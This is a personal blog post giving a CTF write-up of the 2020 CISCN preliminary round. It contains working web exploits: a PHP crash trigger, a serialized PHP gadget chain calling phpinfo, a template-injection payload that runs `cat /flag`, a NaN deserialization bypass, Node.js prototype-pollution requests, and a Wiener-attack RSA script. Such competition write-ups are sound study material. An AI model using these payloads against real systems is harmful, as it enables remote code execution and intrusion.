2020ciscn初赛

web ctf

字数统计: 661阅读时长: 3 min

 2020/08/21   Share

初赛还算简单，都是可以搜索到的，就是比较花费功夫，不得不说web🐶是真的没有人权，加起来不到200分，做最多的题，拿最低的分。

2020ciscn初赛

web

easyphp

把它异常退出就给flag

https://bugs.php.net/bug.php?id=79982

call_user_func_array(“stream_socket_client”,[“aa”,false,true]);

触发崩溃

http://eci-2zeahv20ya7x7jyq6zh8.cloudeci1.ichunqiu.com/?a=stream_socket_client&b=aa

搜flag就ok

babyunserialize

Wmctf2020 webweb，原题，加ban了一点函数，不过没有什么大的区别

flag在phpinfo

<?php
namespace DB{
    abstract class Cursor  implements \IteratorAggregate {}
}


namespace DB\SQL{
    class Mapper extends \DB\Cursor{
        protected
            $props=["quotekey"=>"phpinfo"],
            $adhoc=["-1"=>["expr"=>""]],
            $db;
        function offsetExists($offset){}
        function offsetGet($offset){}
        function offsetSet($offset, $value){}
        function offsetUnset($offset){}
        function getIterator(){}
        function __construct($val){
            $this->db = $val;
        }
    }
}
namespace CLI{
    class Agent {
        protected
            $server="";
        public $events;
        public function __construct(){
            $this->events=["disconnect"=>array(new \DB\SQL\Mapper(new \DB\SQL\Mapper("")),"find")];
            $this->server=&$this;


        }
    };
    class WS{}
}
namespace {
    echo urlencode(serialize(array(new \CLI\WS(),new \CLI\Agent())));
}

rceme

https://blog.csdn.net/CSDNPM250/article/details/104211233

{if:1);phpinfo();//}{end if}就命令执行了

使用反引号命令执行

1	{if:1);var_dump(`cat /flag`);//}{end if}

easytrick

使用NAN即无穷即可绕过

<?php
class trick{
    public $trick1;
    public $trick2;
}
$a = new trick();
$a->trick1=INF / INF;
$b = INF - INF;
$a->trick2=$b;
print serialize($a);

littlegame

Nodejs 代码很简单审计完就大致可以猜到是原型链污染(index.js)

污染admin就可以，往上找可以看到admin用了环境变量

看到我们的污染源头是setFn

如果污染了knight，顺着session，就来到这里（app.js）

和process扯上了，于是所有都扯上了(表达可能有点不清楚)

所以payload只需要

POST /Privilege
NewAttributeKey=__proto__.passwd&NewAttributeValue=123

然后再

POST /DeveloperControlPanel
key=passwd&password=123

nodejs特性，可能要把容器重新开一下再试。

Crypto

db

winner attack

import gmpy2
import time
def continuedFra(x, y):
    cF = []
    while y:
        cF += [x / y]
        x, y = y, x % y
    return cF
def Simplify(ctnf):
    numerator = 0
    denominator = 1
    for x in ctnf[::-1]:
        numerator, denominator = denominator, x * denominator + numerator
    return (numerator, denominator)

def calculateFrac(x, y):
    cF = continuedFra(x, y)
    cF = map(Simplify, (cF[0:i] for i in xrange(1, len(cF))))
    return cF
def solve_pq(a, b, c):
    par = gmpy2.isqrt(b * b - 4 * a * c)
    return (-b + par) / (2 * a), (-b - par) / (2 * a)
def wienerAttack(e, n):
    for (d, k) in calculateFrac(e, n):
        if k == 0: continue
        if (e * d - 1) % k != 0: continue
        phi = (e * d - 1) / k
        p, q = solve_pq(1, n - phi + 1, n)
        if p * q == n:
            return abs(int(p)), abs(int(q))
    print 'not find!'
time.clock()
n = 86966590627372918010571457840724456774194080910694231109811773050866217415975647358784246153710824794652840306389428729923771431340699346354646708396564203957270393882105042714920060055401541794748437242707186192941546185666953574082803056612193004258064074902605834799171191314001030749992715155125694272289
e = 46867417013414476511855705167486515292101865210840925173161828985833867821644239088991107524584028941183216735115986313719966458608881689802377181633111389920813814350964315420422257050287517851213109465823444767895817372377616723406116946259672358254060231210263961445286931270444042869857616609048537240249
c = 37625098109081701774571613785279343908814425141123915351527903477451570893536663171806089364574293449414561630485312247061686191366669404389142347972565020570877175992098033759403318443705791866939363061966538210758611679849037990315161035649389943256526167843576617469134413191950908582922902210791377220066
p, q = wienerAttack(e, n)
print '[+]Found!'
print '  [-]p =',p
print '  [-]q =',q
print '  [-]n =',p*q
d = gmpy2.invert(e,(p-1)*(q-1))
print '  [-]d =', d
print '  [-]m is:' + '{:x}'.format(pow(c,d,n)).decode('hex')
print '\n[!]Timer:', round(time.clock(),2), 's'
print '[!]All Done!'

第一道rsa待补充，怕是需要太湖之光

原文作者：JiangNiao

原文链接：https://github.com/Jiang-Niao/Jiang-Niao.github.io/2020/08/21/2020ciscn%E5%88%9D%E8%B5%9B/

发表日期：August 21st 2020, 5:11:19 pm

更新日期：August 21st 2020, 5:28:45 pm

Next Post

2020强网杯web
Previous Post

Java学习有关重写和重载

CATALOG

1. 2020ciscn初赛
1. 1.1. web
2. 1.2. Crypto
  1. 1.2.1. db



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true